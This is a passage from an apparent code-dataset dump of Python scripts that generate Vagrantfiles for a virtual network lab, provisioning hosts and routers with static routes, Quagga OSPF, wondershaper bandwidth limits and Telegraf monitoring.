true\\n\")\n if Id == 5:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\")\n if Id == 6:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-3\\\", auto_config: true\\n\")\n \n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started for \" + Name + \"\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo route add -net \" + str(IpNet) + \" netmask \" + Netmask + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n 
f.write('cd wondershaper\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\")#here there is the custom script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\n\n#this function writes a new Router in the Vagrantfile\ndef writeRouter(f,Router, edges):\n\n Id = Router[\"id\"]\n Name = Router[\"label\"]\n Os = Router[\"vm_image\"]\n Ram = Router[\"ram\"]\n N_Cpus = Router[\"n_cpus\"]\n\n Ip1 = Router[\"network_interfaces\"][0][\"ip_address\"]\n Netmask1 = Router[\"network_interfaces\"][0][\"netmask\"]\n Interface1 = Router[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference1 = Router[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth1 = 0\n DownlinkBandwidth1 = 0\n for edge in edges:\n if EdgeReference1[0] == edge[\"from\"] and EdgeReference1[1] == edge[\"to\"]:\n UplinkBandwidth1 = edge[\"bandwidth_up\"]\n DownlinkBandwidth1 = edge[\"bandwidth_down\"]\n IpNoSub1 = Ip1.split(\"/\")[0]\n NetmaskAbbr1 = Ip1.split(\"/\")[1]\n\n Ip2 = Router[\"network_interfaces\"][1][\"ip_address\"]\n Netmask2 = Router[\"network_interfaces\"][1][\"netmask\"]\n Interface2 = Router[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReference2 = Router[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidth2 = 0\n DownlinkBandwidth2 = 0\n for edge in edges:\n if EdgeReference2[0] == edge[\"from\"] and EdgeReference2[1] == edge[\"to\"]:\n UplinkBandwidth2 = edge[\"bandwidth_up\"]\n DownlinkBandwidth2 = edge[\"bandwidth_down\"]\n IpNoSub2 = Ip2.split(\"/\")[0]\n NetmaskAbbr2 = Ip2.split(\"/\")[1]\n\n Ip3 = Router[\"network_interfaces\"][2][\"ip_address\"]\n Netmask3 = Router[\"network_interfaces\"][2][\"netmask\"]\n Interface3 = Router[\"network_interfaces\"][2][\"name_interface\"]\n EdgeReference3 = Router[\"network_interfaces\"][2][\"edge\"]\n UplinkBandwidth3 = 0\n DownlinkBandwidth3 = 0\n for edge in edges:\n if EdgeReference3[0] == edge[\"from\"] and EdgeReference3[1] == edge[\"to\"]:\n UplinkBandwidth3 = edge[\"bandwidth_up\"]\n DownlinkBandwidth3 = edge[\"bandwidth_down\"]\n IpNoSub3 = Ip3.split(\"/\")[0]\n NetmaskAbbr3 = Ip3.split(\"/\")[1]\n \n Network1 = ipcalc.Network(Ip1)\n IpNet1 = Network1.network()\n for x in Network1:\n Gateway1 = str(x)\n\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = Network2.network()\n for x in Network2:\n Gateway2 = str(x)\n\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = Network3.network()\n for x in Network3:\n Gateway3 = str(x) \n\n CustomScript = Router[\"custom_script\"] \n\n f.write(\"config.vm.define \\\"\"+ Name +\"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\"+ Name +\"\\\"\\n\")\n\n if Id == 1:\n f.write(Name + \".vm.network 
\\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-1\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-3\\\", auto_config: false\\n\")\n if Id == 2:\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-2\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-1\\\", auto_config: false\\n\")\n if Id == 3:\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-3\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-3\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-2\\\", auto_config: false\\n\") \n\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\" Quagga \"+ Name +\" start installing\\\"\\n\")\n f.write(\"#sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo apt-get update\\n\")\n f.write(\"sudo apt-get install quagga quagga-doc traceroute\\n\")\n f.write(\"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\\n\")\n f.write(\"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\\n\")\n f.write(\"sudo chown quagga.quaggavty /etc/quagga/*.conf\\n\")\n f.write(\"sudo /etc/init.d/quagga start\\n\")\n f.write(\"sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\\n\")\n f.write(\"sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\\n\")\n f.write(\"sudo echo 'VTYSH_PAGER=more' >>/etc/environment\\n\")\n f.write(\"sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\\n\")\n f.write(\"sudo /etc/init.d/quagga restart\\n\")\n f.write(\"echo \\\"Routing Protocol ospf Configuration Started\\\"\\n\")\n f.write(\"sudo vtysh -c '\\n\")\n f.write(\"configure terminal\\n\")\n f.write(\"router ospf\\n\")\n f.write(\"network \" + str(IpNet1) + \"/\" + NetmaskAbbr1 + \" area 0.0.0.0\\n\")\n f.write(\"network \" + str(IpNet2) + \"/\" + NetmaskAbbr2 + \" area 0.0.0.0\\n\") \n f.write(\"network \" + str(IpNet3) + \"/\" + NetmaskAbbr3 + \" area 0.0.0.0\\n\") \n f.write(\"exit\\n\")\n f.write(\"interface \" + Interface1 + \"\\n\")\n f.write(\"ip address \" + IpNoSub1 + \"/\" + NetmaskAbbr1 + \"\\n\")\n f.write(\"exit\\n\")\n f.write(\"interface \" + Interface2 + \"\\n\")\n f.write(\"ip address \" + IpNoSub2 + \"/\" + NetmaskAbbr2 + \"\\n\")\n f.write(\"exit\\n\")\n f.write(\"interface \" + Interface3 + \"\\n\")\n f.write(\"ip address \" + IpNoSub3 + \"/\" + NetmaskAbbr3 + \"\\n\")\n f.write(\"do write\\n\")\n f.write(\"exit\\n\")\n f.write(\"exit\\n\")\n f.write(\"ip forwarding\\n\")\n f.write(\"exit'\\n\")\n\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth1 > 0 or DownlinkBandwidth1 > 0:\n f.write('sudo ./wondershaper -a ' + Interface1)\n if DownlinkBandwidth1 
> 0:\n f.write(' -d ' + str(DownlinkBandwidth1))\n if UplinkBandwidth1 > 0:\n f.write(' -u ' + str(UplinkBandwidth1))\n f.write('\\n')\n\n if UplinkBandwidth2 > 0 or DownlinkBandwidth2 > 0:\n f.write('sudo ./wondershaper -a ' + Interface2)\n if DownlinkBandwidth2 > 0:\n f.write(' -d ' + str(DownlinkBandwidth2))\n if UplinkBandwidth2 > 0:\n f.write(' -u ' + str(UplinkBandwidth2))\n f.write('\\n')\n \n if UplinkBandwidth3 > 0 or DownlinkBandwidth3 > 0:\n f.write('sudo ./wondershaper -a ' + Interface3)\n if DownlinkBandwidth3 > 0:\n f.write(' -d ' + str(DownlinkBandwidth3))\n if UplinkBandwidth3 > 0:\n f.write(' -u ' + str(UplinkBandwidth3))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custom script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(\"# \" + Name + \".vm.provision \\\"shell\\\", path: \\\"common.sh\\\"\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\n\"\"\"\n#the following is a fake graph that I used for testing\n#instead of typing every time the input in the command line\nhost1 = (4,{\n \"Id\" : 4,\n \"Name\":\"host1\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.1.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost2 = (5,{\n \"Id\" : 5,\n \"Name\":\"host2\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.2.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost3 = (6,{\n \"Id\" : 6,\n \"Name\":\"host3\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.3.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\nrout1 = (1,{\n \"Id\" : 1,\n \"Name\":\"router1\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\": \"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.1.254/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"192.168.100.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth2\"\n },{\n \"Ip\": \"192.168.101.2/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth3\"\n }]\n})\nrout2 = (2,{\n \"Id\" : 2,\n \"Name\":\"router2\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\": \"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.2.254/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"192.168.100.2/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth2\"\n },{\n \"Ip\": \"192.168.102.2/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth3\"\n }]\n})\nrout3 = (3,{\n \"Id\" : 3,\n 
\"Name\":\"ruoter3\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\": \"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.3.254/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"192.168.101.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth2\"\n },{\n \"Ip\": \"192.168.102.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth3\"\n }]\n})\n\nMyNet = [host1,host2,host3,rout1,rout2,rout3]\n\ndef remap(newList):\n print(\"-------------------\")\n\n for item in newList:\n print(\"Looking at device \" + str(item))\n print(\"the TYPE is \" + item[\"type\"])\n if item[\"type\"] == \"router\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n device[1][\"Network\"][1][\"Ip\"] = item[\"network_interfaces\"][1][\"ip_address\"]\n device[1][\"Network\"][1][\"Netmask\"] = item[\"network_interfaces\"][1][\"netmask\"]\n device[1][\"Network\"][1][\"Interface\"] = item[\"network_interfaces\"][1][\"name_interface\"]\n\n device[1][\"Network\"][2][\"Ip\"] = item[\"network_interfaces\"][2][\"ip_address\"]\n device[1][\"Network\"][2][\"Netmask\"] = item[\"network_interfaces\"][2][\"netmask\"]\n device[1][\"Network\"][2][\"Interface\"] = item[\"network_interfaces\"][2][\"name_interface\"] \n\n for item in newList:\n if item[\"type\"] == \"host\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n return MyNet\n\"\"\"\n\ndef html_to_vagrantfile(nodes, edges):\n VagrantFile = open(\"Vagrantfile\", \"w\")\n\n BeginVagrantFile(VagrantFile)\n for node in nodes:\n if node[\"type\"] == \"router\":\n writeRouter(VagrantFile, node, edges)\n if node[\"type\"] == \"host\":\n writeHost(VagrantFile, node, edges) \n\n VagrantFile.write(\"end\\n\")\n VagrantFile.close()\n\n #read the data structure from input\n #Network = G.nodes.data():\n #file = codecs.open(network_path, \"r\", \"utf-8\")\n #html = file.read()\n\n #if \"nodes = new vis.DataSet(\" in html:\n #listOfDevice = find_between(html, \"nodes = new vis.DataSet(\" , \")\")\n #print(listOfDevice)\n #listOfDevice = yaml.load(listOfDevice) \n\n\n #Network = remap(listOfDevice)\n #Network = listOfDevice\n #N.B per Luca, Network è già la lista dei nodi che puoi esplorare\n\n #first, let's write the beginnig of the VagrantFile\n\n #second, let's write each device with his feature\n #this topology has 3 hosts and 3 routers\n #call the respective function to \"populate\" the vagrant file\n\n #BeginVagrantFile(VagrantFile)\n\n #for device in Network: \n # 
typeOfDevice = device[1][\"Type\"]\n #print(\"the device is a \" + typeOfDevice)\n\n # if typeOfDevice is \"Router\":\n # writeRouter(VagrantFile,device)\n\n\n #for device in Network:\n # typeOfDevice = device[1][\"Type\"]\n #print(\"the device is a \" + typeOfDevice)\n\n # if typeOfDevice is \"Host\":\n # writeHost(VagrantFile,device)\n\n\n\n"
},
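The OSPF generator above relies on ipcalc for two derivations: the network address written into `route add -net` and into the Quagga `network ... area` statements, and a gateway obtained by iterating the range and keeping the last address yielded (the template pairs this with routers sitting on the highest host address, e.g. .254). A small sketch of those calls; the address is an example, and the iteration semantics are assumed to match what the template relies on:

```python
import ipcalc

net = ipcalc.Network("192.168.1.1/24")        # example address from the template
print(str(net.network()))                     # -> 192.168.1.0, used in 'route add -net'
bare_ip = "192.168.1.1/24".split("/")[0]      # -> 192.168.1.1, bare address for vm.network

# writeHost's gateway derivation: keep the last address ipcalc yields.
gateway = None
for x in net:
    gateway = str(x)
```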
{
"alpha_fraction": 0.5724530816078186,
"alphanum_fraction": 0.6066775321960449,
"avg_line_length": 39.47903060913086,
"blob_id": "b841c81f6d48742679f9fc89d39908a33a81c993",
"content_id": "4cbb07b1d8a6e49f3e91d5c815b3b32a02de2a6b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25101,
"license_type": "permissive",
"max_line_length": 239,
"num_lines": 620,
"path": "/fromHTMLtoVagrant/VagrantTopologySwitch.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc \n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f):\n print(\"writing the beginning of the vagrant file\")\n f.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\n f.write(\"#All Vagrant configuration is done below. The 2 in Vagrant.configure\\n#configures the configuration version we support older styles for\\n#backwards compatibility. Please don't change it unless you know what\\n#you're doing.\\n\")\n f.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\n f.write(\"config.vm.box_check_update = true\\n\")\n f.write(\"config.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usb\\\", \\\"on\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usbehci\\\", \\\"off\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc2\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc3\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc4\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc5\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.cpus = 1\\n\")\n f.write(\"end\\n\")\n\n\n#this function write in the vagrant file a new PC host\ndef writeHost(f, Host, edges, network):\n\n Id = Host[\"id\"]\n Name = Host[\"label\"]\n Os = Host[\"vm_image\"]\n Ram = Host[\"ram\"]\n N_Cpus = Host[\"n_cpus\"]\n CustumScript = Host[\"custom_script\"]\n Ip = Host[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Host[\"network_interfaces\"][0][\"netmask\"]\n Interface = Host[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Host[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n\n IpRouter2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskRouter2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkRouter2 = ipcalc.Network(IpRouter2)\n IpNetRouter2 = str(NetworkRouter2.network())\n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpRouter1_1 = network[0][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskRouter1_1 = network[0][\"network_interfaces\"][0][\"netmask\"]\n NetworkRouter1_1 = ipcalc.Network(IpRouter1_1)\n IpNetRouter1_1 = str(NetworkRouter1_1.network())\n \"\"\"\n Ip3 = Topology[3][1][\"Network\"][0][\"Ip\"]\n Mask3 = Topology[3][1][\"Network\"][0][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n \"\"\"\n\n IpRouter1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskRouter1_2 = network[0][\"network_interfaces\"][1][\"netmask\"]\n NetworkRouter1_2 = ipcalc.Network(IpRouter1_2)\n IpNetRouter1_2 = str(NetworkRouter1_2.network())\n \"\"\"\n Ip4 = Topology[3][1][\"Network\"][1][\"Ip\"]\n Mask4 = Topology[3][1][\"Network\"][1][\"Netmask\"]\n Network4 = ipcalc.Network(Ip4)\n IpNet4 = str(Network4.network())\n \"\"\"\n\n IpSwitch_1 = network[2][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskSwitch_1 = network[2][\"network_interfaces\"][0][\"netmask\"]\n NetworkSwitch_1 = 
ipcalc.Network(IpSwitch_1)\n IpNetSwitch_1 = str(NetworkSwitch_1.network())\n \"\"\"\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n \"\"\"\n\n IpSwitch_2 = network[2][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskSwitch_2 = network[2][\"network_interfaces\"][1][\"netmask\"]\n NetworkSwitch_2 = ipcalc.Network(IpSwitch_2)\n IpNetSwitch_2 = str(NetworkSwitch_2.network())\n \"\"\"\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n \"\"\"\n\n if Id == 4:\n Gateway = IpSwitch_1.split(\"/\")[0]\n\n if Id == 5:\n Gateway = IpSwitch_2.split(\"/\")[0]\n\n if Id == 6:\n Gateway = IpRouter2.split(\"/\")[0]\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n if Id == 4:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_host_\" + Name + \"\\\", auto_config: true\\n\")\n if Id == 5:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_host_\" + Name + \"\\\", auto_config: true\\n\")\n if Id == 6:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\") \n \n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routing configuration Started for \" + Name + \"\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n f.write(\"sudo route add -net \" + IpNetRouter2 + \" netmask \" + NetmaskRouter2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetRouter1_1 + \" netmask \" + NetmaskRouter1_1 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetRouter1_2 + \" netmask \" + NetmaskRouter1_2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\") \n\n if Id == 4: \n f.write(\"sudo route add -net \"+ IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n if Id == 5:\n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n if Id == 6: \n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n \n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget 
https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustumScript + \" \\n\") #here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n if Id == 4:\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Installation of Web-Server\\\"\\n\")\n f.write(\"sudo apt-get update\\n\")\n f.write(\"sudo apt-get install -y apache2\\n\")\n f.write(\"echo \\\"Web-ServerServer is installed and Runing\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\n\n#this function write in the vagrant file a new Router\ndef writeRouter(f, Router, edges, network):\n\n Id = Router[\"id\"]\n Name = Router[\"label\"]\n Os = Router[\"vm_image\"]\n Ram = Router[\"ram\"]\n N_Cpus = Router[\"n_cpus\"]\n\n Ip1 = Router[\"network_interfaces\"][0][\"ip_address\"]\n Netmask1 = Router[\"network_interfaces\"][0][\"netmask\"]\n Interface1 = Router[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference1 = Router[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth1 = 0\n DownlinkBandwidth1 = 0\n for edge in edges:\n if EdgeReference1[0] == edge[\"from\"] and EdgeReference1[1] == edge[\"to\"]:\n UplinkBandwidth1 = edge[\"bandwidth_up\"]\n DownlinkBandwidth1 = edge[\"bandwidth_down\"]\n IpNoSub1 = Ip1.split(\"/\")[0]\n NetmaskAbbr1 = Ip1.split(\"/\")[1]\n\n Ip2 = Router[\"network_interfaces\"][1][\"ip_address\"]\n Netmask2 = Router[\"network_interfaces\"][1][\"netmask\"]\n Interface2 = Router[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReference2 = Router[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidth2 = 0\n DownlinkBandwidth2 = 0\n for edge in edges:\n if EdgeReference2[0] == edge[\"from\"] and EdgeReference2[1] == edge[\"to\"]:\n UplinkBandwidth2 = edge[\"bandwidth_up\"]\n DownlinkBandwidth2 = 